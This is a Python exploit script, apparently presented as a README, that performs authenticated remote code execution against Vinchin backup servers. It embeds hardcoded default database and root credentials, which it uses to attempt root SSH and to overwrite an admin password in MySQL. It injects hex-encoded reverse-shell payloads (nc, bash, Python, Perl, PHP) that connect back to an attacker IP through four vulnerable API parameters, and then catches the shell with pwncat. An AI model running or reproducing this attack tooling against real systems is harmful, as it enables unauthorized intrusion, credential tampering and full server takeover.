README.md
Rendering markdown...
import re
import sys
import time
import json
import random
import string
import socket
import hashlib
import requests
import binascii
import argparse
import threading
import pwncat.manager
import mysql.connector
from packaging import version
from selenium import webdriver
from rich.console import Console
from urllib.parse import urlparse
from fake_useragent import UserAgent
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.support.ui import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support import expected_conditions as EC
from requests.packages.urllib3.exceptions import InsecureRequestWarning
class VinchinRCE:
def __init__(
self,
url: str,
payload: str,
username: str,
password: str,
rshell_ip: str,
rshell_port: str,
payload_type: str,
):
self.url = url
self.username = username
self.password = password
self.old_password = None
self.rshell_ip = rshell_ip
self.rshell_port = rshell_port
self.payload_type = payload_type
self.revshell_connected = False
self.user_agent = UserAgent().random
self.db_user = "vinchin"
self.db_password = "yunqi123456"
self.db_name = "vinchin_db"
self.root_user = "root"
self.root_password = "Backup@3R"
self.console = Console()
self.driver = self.setup_driver()
self.payloads = {
"nc": f"nc -e /bin/bash {self.rshell_ip} {self.rshell_port}",
"bash": f"bash -i >& /dev/tcp/{self.rshell_ip}/{self.rshell_port} 0>&1",
"python": (
f"python -c 'import os,pty,socket;"
f's=socket.socket();s.connect(("{self.rshell_ip}",{self.rshell_port}));'
f"[os.dup2(s.fileno(),f) for f in (0, 1, 2)];"
f'pty.spawn("bash")\''
),
"perl": (
f'perl -e \'use Socket;$i="{self.rshell_ip}";$p={self.rshell_port};'
f'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
f"if(connect(S,sockaddr_in($p,inet_aton($i)))){{"
f'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
f'exec("bash -i");}};\''
),
"php": (
f'php -r \'$sock=fsockopen("{self.rshell_ip}",{self.rshell_port});'
f'$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);\''
),
}
self.payload = self.construct_command(self.payloads[payload])
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@staticmethod
def construct_command(payload: str) -> str:
hex_encoded_payload = binascii.hexlify(payload.encode()).decode()
formatted_payload = "".join(
[
"\\x" + hex_encoded_payload[i : i + 2]
for i in range(0, len(hex_encoded_payload), 2)
]
)
command = f";echo -e {formatted_payload}|bash;"
return command
def check_vinchin_version(self, page_html: str) -> None:
if page_html is None:
self.custom_print("Failed to connect to the target.", "-")
sys.exit(1)
version_pattern = r"Vinchin build: (\d+\.\d+\.\d+\.\d+)"
version_match = re.search(version_pattern, page_html)
if not version_match:
self.custom_print("Unable to extract version.", "-")
sys.exit(1)
detected_version = version.parse(version_match.group(1))
self.custom_print(f"Detected Vinchin version: {detected_version}", "*")
vulnerable_versions = [
(version.parse("5.0.0"), version.parse("5.1.0")),
(version.parse("6.0.0"), version.parse("6.1.0")),
(version.parse("6.7.0"), version.parse("6.8.0")),
(version.parse("7.0.0"), version.parse("7.3.0")),
]
for low, high in vulnerable_versions:
if low <= detected_version < high:
self.custom_print(
f"Vinchin version {detected_version} is vulnerable.", "+"
)
return
self.custom_print(f"Vinchin version {detected_version} is not vulnerable.", "-")
sys.exit(1)
def manage_db_password(self, action) -> None:
parsed_url = urlparse(self.url)
self.db_host = parsed_url.hostname
connection = None
cursor = None
original_hash = None
try:
connection = mysql.connector.connect(
host=self.db_host,
user=self.db_user,
password=self.db_password,
database=self.db_name,
connection_timeout=5,
)
cursor = connection.cursor()
match action:
case "change":
new_password = "".join(
random.choices(string.ascii_letters + string.digits, k=10)
)
new_hash = hashlib.md5(new_password.encode()).hexdigest()
cursor.execute(
"SELECT password FROM bd_user WHERE user_name = %s",
(self.username,),
)
result = cursor.fetchone()
original_hash = result[0] if result else None
cursor.execute(
"UPDATE bd_user SET password = %s WHERE user_name = %s",
(new_hash, self.username),
)
self.password = new_password
self.old_password = original_hash
self.custom_print(
f"Password for user '{self.username}' changed to {new_password}.",
"+",
)
connection.commit()
self.login()
case "restore":
cursor.execute(
"UPDATE bd_user SET password = %s WHERE user_name = %s",
(self.old_password, self.username),
)
self.password = self.old_password
self.custom_print(
f"Restored the original password for user '{self.username}'.",
"+",
)
connection.commit()
case _:
self.custom_print(f"Unknown action: {action}", "-")
except mysql.connector.Error as error:
self.custom_print(f"Failed to {action} the password: {error}", "-")
if action == "change" and original_hash:
self.password = original_hash
else:
self.custom_print(
f"Attempting to log in with the original credentials: user={self.username}, password={self.password}",
"!",
)
self.login()
finally:
if cursor:
cursor.close()
if connection and connection.is_connected():
connection.close()
def setup_driver(self) -> webdriver.Chrome:
self.custom_print("Initializing WebDriver...", "*")
self.custom_print("Configuring Chrome options...", "*")
options = Options()
options.add_argument("--ignore-certificate-errors")
options.add_argument("--headless")
options.add_argument(f"user-agent={self.user_agent}")
self.custom_print("Setting up WebDriver service...", "*")
service = Service(ChromeDriverManager().install())
self.custom_print("Launching Chrome browser...", "*")
driver = webdriver.Chrome(service=service, options=options)
driver.set_window_size(1366, 768)
return driver
def custom_print(self, message: str, header: str) -> None:
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(
f"[bold {header_colors[header]}][{header}][/bold {header_colors[header]}] {message}"
)
def start_listener(self, timeout=30) -> None:
with socket.create_server((self.rshell_ip, int(self.rshell_port))) as listener:
listener.settimeout(timeout)
self.custom_print(
f"Waiting for incoming connection on port {self.rshell_port}...", "*"
)
try:
victim, victim_addr = listener.accept()
self.revshell_connected = True
self.custom_print(
f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+"
)
with pwncat.manager.Manager() as manager:
manager.create_session(
platform="linux", protocol="socket", client=victim
)
self.custom_print("Dropping to pwncat prompt...", "+")
manager.interactive()
except socket.timeout:
self.custom_print(
f"No reverse shell connection received within {timeout} seconds.",
"-",
)
def root_ssh(self) -> None:
self.custom_print("Attempting SSH connection...", "*")
try:
parsed_url = urlparse(self.url)
ssh_target = parsed_url.hostname
with pwncat.manager.Manager() as manager:
manager.create_session(
platform="linux",
protocol="ssh",
host=ssh_target,
user=self.root_user,
password=self.root_password,
timeout=5,
)
self.custom_print(
"SSH connection successful, entering interactive mode.", "+"
)
manager.interactive()
return True
except Exception as e:
self.custom_print(f"SSH connection failed: {e}", "-")
return False
def login(self) -> None:
try:
self.driver.get(self.url)
page_html = self.driver.page_source
self.check_vinchin_version(page_html)
self.custom_print("Waiting for the username input field...", "*")
username_input = WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.NAME, "username"))
)
self.custom_print("Waiting for the password input field...", "*")
password_input = WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.NAME, "password"))
)
self.custom_print("Waiting for the submit button...", "*")
submit_button = WebDriverWait(self.driver, 10).until(
EC.element_to_be_clickable((By.ID, "login-btn"))
)
self.custom_print("Sending username and password...", "*")
username_input.send_keys(self.username)
password_input.send_keys(self.password)
self.custom_print("Submitting the form...", "*")
submit_button.click()
time.sleep(2)
error_alert = self.driver.find_element(By.CLASS_NAME, "my_alert")
if "display: block;" in error_alert.get_attribute("style"):
self.custom_print(
"Login failed due to an error alert on the page.", "-"
)
sys.exit(1)
except NoSuchElementException:
self.custom_print("Logged In!", "+")
self.manage_db_password("restore") if self.old_password else None
self.custom_print(f"Using {self.payload_type} exploitation method !", "+")
match self.payload_type:
case "setNetworkCardInfo":
self.setNetworkCardInfo()
case "syncNtpTime":
self.syncNtpTime()
case "deleteUpdateAPK":
self.deleteUpdateAPK()
case "getVerifydiyResult":
self.getVerifydiyResult()
except Exception as e:
self.custom_print(f"An error occurred during login: {e}", "-")
self.manage_db_password("restore") if self.old_password else None
sys.exit(1)
def send_http_request(self, function_name: str, params: dict, module: str) -> None:
cookies = self.driver.get_cookies()
session = requests.Session()
cookie_dict = {cookie["name"]: cookie["value"] for cookie in cookies}
data = {"m": module, "f": function_name, "p": json.dumps(params)}
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": self.user_agent,
"Origin": self.url,
}
try:
session.post(
f"{self.url}/api/",
headers=headers,
cookies=cookie_dict,
data=data,
verify=False,
timeout=5,
)
except requests.exceptions.Timeout:
pass
except requests.exceptions.RequestException as e:
self.custom_print(f"An error occurred: {e}", "-")
def setNetworkCardInfo(self) -> None:
self.custom_print("Navigating to system management...", "*")
system_link = WebDriverWait(self.driver, 10).until(
EC.element_to_be_clickable((By.NAME, "sysmanagement"))
)
system_link.click()
self.custom_print("Navigating to setting manager...", "*")
setting_manager_link = WebDriverWait(self.driver, 10).until(
EC.element_to_be_clickable((By.NAME, "setting_manager"))
)
setting_manager_link.click()
self.custom_print("Navigating to network settings...", "*")
network_settings_link = WebDriverWait(self.driver, 10).until(
EC.element_to_be_clickable(
(By.XPATH, "//a[contains(@href, 'system_network.php')]")
)
)
network_settings_link.click()
self.custom_print(
f"Injecting payload for reverse shell: {self.rshell_ip}:{self.rshell_port}...",
"*",
)
networkcard_option = WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located(
(By.XPATH, "//select[@name='networkcard']/option")
)
)
self.driver.execute_script(
"arguments[0].innerText = arguments[1]", networkcard_option, self.payload
)
self.custom_print("Submitting the network settings form...", "*")
ok_button = WebDriverWait(self.driver, 15).until(
EC.element_to_be_clickable((By.ID, "ipsubmit"))
)
ok_button.click()
self.custom_print("Check your listener h4x0rm4n...", "+")
def syncNtpTime(self) -> None:
params = {"ntphost": f"time.nist.gov {self.payload}"}
self.send_http_request("syncNtpTime", params, "8")
def deleteUpdateAPK(self) -> None:
params = {"md5": "h4x0rm4n", "file_name": self.payload}
self.send_http_request("deleteUpdateAPK", params, "8")
def getVerifydiyResult(self) -> None:
params = {"type": "1", "value": f"127.0.0.1 {self.payload}"}
self.send_http_request("getVerifydiyResult", params, "14")
def main() -> None:
parser = argparse.ArgumentParser(description="Authenticated RCE on VinChin 7.2.")
parser.add_argument(
"-u",
"--url",
default="https://192.168.1.7",
help="URL of the login page",
)
parser.add_argument(
"-user", "--username", default="admin", help="Username for login"
)
parser.add_argument(
"-p", "--password", default="123456", help="Password for login"
)
parser.add_argument(
"-rip", "--rshell_ip", default="192.168.1.5", help="Reverse shell IP address"
)
parser.add_argument(
"-rport", "--rshell_port", default="1338", help="Reverse shell port"
)
parser.add_argument(
"--payload_type",
default="syncNtpTime",
choices=[
"setNetworkCardInfo",
"syncNtpTime",
"deleteUpdateAPK",
"getVerifydiyResult",
],
help="Type of payload to send",
)
parser.add_argument(
"--payload",
choices=["nc", "bash", "python", "perl", "php"],
default="nc",
help="Type of payload to use (choices: 'nc', 'bash', 'python', 'perl', 'php'), default='nc'",
)
args = parser.parse_args()
vinchin_rce = VinchinRCE(
args.url,
args.payload,
args.username,
args.password,
args.rshell_ip,
args.rshell_port,
args.payload_type,
)
if not vinchin_rce.root_ssh():
listener_thread = threading.Thread(target=vinchin_rce.start_listener)
listener_thread.daemon = True
listener_thread.start()
vinchin_rce.manage_db_password("change")
listener_thread.join()
if __name__ == "__main__":
main()